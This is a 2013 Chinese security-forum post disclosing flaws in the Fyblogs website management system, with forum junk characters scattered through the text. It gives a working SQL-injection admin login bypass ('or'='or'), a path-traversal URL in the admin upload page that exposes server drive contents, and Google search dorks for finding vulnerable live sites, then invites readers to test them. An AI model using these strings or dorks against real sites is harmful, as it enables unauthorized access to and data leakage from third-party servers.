找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2065|回复: 0
打印 上一主题 下一主题

Fyblogs网站管理系统漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2013-3-7 13:07:46 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
漏洞类型: 未授权访问/权限绕过$ r$ `! D3 ~  H# G; K5 D& G

% Y$ ^. Q" n* J7 t* d. H  Y简要描述:# ?# x5 S. e, R$ r8 i+ t

  o) T, Q- ^- _! v* bFyblogs网站管理系统,,后台存在万能密码,后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露!
1 L- C' x) r) V: K/ M3 @
% d5 h9 g$ ]) p5 ^3 G* y( n详细说明:
# M& I- t: b5 E' O$ s, P" O3 N/ Y$ j
% L/ R2 }" F, u$ x' ?4 {后台万能密码 'or'='or'
/ O5 j  [8 z1 t' S: N4 X( t后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露!" d6 l* Q. ^1 ~  u: S" \
admin/uploadfile.asp?currentFolder=/upfiles/..// @" r) c) ]6 {' p- M! @8 a% v  E
0 u3 a. L: A' m/ z' k0 @
漏洞证明:' E* y  y% i9 Q" U% [5 ~

0 R* e- P3 A3 Q" F, u( o1 h谷歌:inurl:type.asp?id=1 新闻中心( q2 d, p% A6 {" p3 V; l
或者 :inurl:download_ok.asp?' F8 X% f' s* j- H! |( Z  l( e8 a
: p! Z/ Q, s: a; Y4 N# l
可以测试2 r0 I" r$ W) F2 R# K' F6 A

8 B& q( T* e4 d  e
2 q6 A) |& w% M
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表